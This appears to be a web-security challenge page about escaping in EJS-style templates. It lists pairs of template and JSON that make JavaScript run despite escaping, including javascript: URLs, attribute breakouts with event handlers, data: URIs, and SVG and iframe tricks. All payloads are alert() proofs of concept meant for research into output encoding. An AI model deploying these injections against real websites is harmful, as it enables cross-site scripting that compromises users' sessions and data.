Challenge: Are you able to run script from a value in the JSON within the template when the template is trying to escape the data?
When you click the Render-button, the untrusted data in the JSON will be applied to the trusted template,
and the output will be displayed on the left. Your goal is to have JS from a JSON value run even though <%= variable %>
is used to output the value containing the attack.
Rules:
<% javascript %>
- run javascript<%= variable %>
- output contents of variable escaped<%- variable %>
- output contents of variable unescapedEmail me or DM me on twitter if you find anything interesting.
Template | JSON |
---|---|
<<%= foo %>> | { "foo" : "img onerror='alert(1)' src=" } |
<form id=x><button form=x formaction="<%= y %>">CLICKME | {"y":"javascript:alert(1)"} |
<div style=mask:url(<%= title %>)></div> | |
<form action="<%= x %>"><<button> | {"x":"javascript:alert(1)"} |
<img src=<%= a %> /><%= b %> | {"a":"'x","b":"'onerror=alert(1)//"} |
<a href=<%=url%> title="Buy <%=number%> at <%=price%> = $<%=cost%>/month AND SAVE $$$">BUY NOW</a> | {"url":"","number":42,"price":"onmouseover","cost":"=alert(1)/"} |
<svg> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#"> <set attributeName="xlink:href" begin="0s" to="<%= x %>" /><circle r=40> </a> </svg> | {"x":"javascript:alert(1)"} |
<object data="<%= boob %>"></object> | {"boob":"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="} |
<input type="text" value=``<"<%=x%>"><%=x%></div> | { "x":"div/onmouseover='alert(1)" } |
<object type="text/x-scriptlet" data="<%=x%>"</object> | { "x":"jsfiddle.net/XLE63/" } |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('<%=x%>')> | {"x":"\u0061"} |
<meta http-equiv="refresh" content="0;url=<%= description %>"> | {"description": "javascript:alert(document.domain)"} |
<a link="<%= d %>" style="-o-link:attr(link);-o-link-source:current">click me</a> | {"description": "data:text/html,<script>alert(document.domain);</script>"} |
<iframe srcdoc='<svg/onload=<%=x%>>'> | {"x":"alert(6)"} |